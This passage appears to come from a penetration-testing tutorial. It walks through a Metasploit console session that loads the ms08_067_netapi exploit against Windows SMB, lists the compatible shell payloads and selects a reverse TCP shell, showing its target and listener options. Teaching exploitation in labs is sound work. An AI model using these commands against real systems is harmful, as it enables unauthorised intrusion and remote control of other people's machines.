The Joy of Exploitation
msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                 Rank    Description
   ----                                 ----    -----------
   . . . SNIP . . .
   windows/shell/reverse_ipv6_tcp       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp            normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports   normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell_bind_tcp               normal  Windows Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp            normal  Windows Command Shell, Reverse TCP Inline

Next, we enter set payload windows/shell/reverse_tcp to select the reverse_tcp payload. When we enter show options again, we see that additional options are shown:

msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port